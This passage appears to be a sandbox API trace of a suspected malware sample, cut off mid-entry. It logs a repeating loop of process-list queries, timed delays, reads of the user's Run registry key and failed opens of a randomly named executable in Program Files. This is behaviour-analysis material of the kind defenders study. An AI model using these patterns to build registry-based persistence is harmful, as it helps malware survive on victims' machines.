[0171.623] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6fff98) returned 1 [0171.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.632] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.652] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.653] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.654] NtClose (Handle=0x270) returned 0x0 [0171.654] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.654] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.654] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7002e0) returned 1 [0171.654] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.654] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.655] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700808) returned 1 [0171.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.674] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.676] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.678] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.678] NtClose (Handle=0x270) returned 0x0 [0171.678] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.678] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.678] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7008f8) returned 1 [0171.678] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.678] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.678] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ffdb8) returned 1 [0171.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.688] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.691] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.693] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.693] NtClose (Handle=0x270) returned 0x0 [0171.693] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.693] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.693] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7009e8) returned 1 [0171.693] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.693] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.693] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7004c0) returned 1 [0171.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.706] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.707] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.707] NtClose (Handle=0x270) returned 0x0 [0171.707] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.707] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.708] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7008f8) returned 1 [0171.708] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.708] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.708] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7003d0) returned 1 [0171.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.717] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.724] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.727] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.727] NtClose (Handle=0x270) returned 0x0 [0171.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.727] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.727] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6ffdb8) returned 1 [0171.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.727] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.727] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6fff20) returned 1 [0171.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.737] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.749] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.750] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.750] NtClose (Handle=0x270) returned 0x0 [0171.750] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.750] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.751] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x700628) returned 1 [0171.751] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.751] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.751] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x7006a0) returned 1 [0171.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0171.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0171.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0171.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0171.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0171.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0171.762] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0171.788] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.790] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.790] NtClose (Handle=0x270) returned 0x0 [0171.790] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.790] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", 